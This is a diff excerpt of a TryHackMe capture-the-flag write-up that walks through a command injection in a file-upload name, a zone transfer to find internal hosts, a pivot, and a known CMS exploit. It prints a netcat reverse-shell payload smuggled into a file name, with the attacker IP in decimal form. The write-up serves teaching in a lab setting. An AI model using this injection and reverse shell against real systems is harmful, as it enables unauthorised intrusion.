ChrisPritchard/ctf-writeups/tryhackme-rooms/tempusfugitdurius.md

 2. This reveals a limit of 30 characters, and the presence of .txt or .rtf somewhere in the name.
 This can be abused to establish a netcat connection, e.g. with `t.txt;nc 168462808 44 -e sh`.
 Note that the ip address of the attack box is converted to its decimal representation (which still works) to reduce character count.

 3. On the machine, its obviously a docker container with limited access.
 However, in /etc/resolv.conf there is an entry for 'mofo.pwn'.
-This is also referenced in the site folder, where files you upload are sent to 'ftp.mofo.pwn'.
+This is also referenced in the site code, where files you upload are sent to 'ftp.mofo.pwn'.
 Dig is on the machine, and via that you can run `dig axfr mofo.pwn` to get a set of IP addresses.

 4. Of these, the ftp IP address is useful (192.168.150.12) and the IP address for a CMS (192.168.150.1).
 By establishing a proxy forward through this docker container (via chisel, meterpreter, reverse_ssh or whatever) the website on .1 is the Batflat CMS, which has a known authenticated exploit here: https://www.exploit-db.com/exploits/49573